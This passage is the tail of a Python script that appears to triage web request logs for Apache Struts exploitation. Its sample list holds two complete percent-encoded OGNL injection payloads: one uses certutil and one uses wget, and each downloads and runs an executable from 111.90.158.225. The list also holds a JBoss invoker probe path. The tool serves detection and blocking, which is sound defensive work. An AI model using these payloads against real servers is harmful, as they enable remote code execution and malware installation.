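    return Finding(url, "probe", [probe]) if probe else Finding(url, "clean")


SAMPLE_REQUESTS = [
    "http://192.168.0.1/",
    "http://192.168.0.1/invoker/JMXInvokerServlet",
    # Windows branch: #_memberAccess template, certutil download of fast.exe.
    "http://192.168.0.1/%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context"
    ".get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28"
    "@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache"
    "%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29"
    ".getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action",
    # Linux branch: OgnlUtil exclusion-list template, wget of ft32 / ft64.
    "http://192.168.0.1/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts"
    ".valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29"
    ".%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou"
    ".getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct"
    ".setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse"
    "%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime"
    "@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&"
    "%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop"
    "%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29"
    ".getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action",
]


def triage_all(urls: List[str] = SAMPLE_REQUESTS) -> List[Finding]:
    return [triage(u) for u in urls]


def second_stage_urls(urls: List[str] = SAMPLE_REQUESTS) -> List[str]:
    """Distinct download URLs across all RCE payloads, in first-seen order."""
    seen: List[str] = []
    for finding in triage_all(urls):
        for u in finding.payload_urls:
            if u not in seen:
                seen.append(u)
    return seen


if __name__ == "__main__":
    for f in triage_all():
        print(f"{f.verdict:9} {f.markers}")
        if f.command:
            print(f"  exec: {f.command}\n  fetches: {f.payload_urls}")
    print("second stage:", second_stage_urls())
```

Matching is done on the fully decoded path rather than on the raw URL, so the marker list is not defeated by alternative or repeated percent-encoding of the same expression; feed it a URL list from a proxy or IDS log in place of SAMPLE_REQUESTS and second_stage_urls() gives the set of hosts and files to block and collect.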
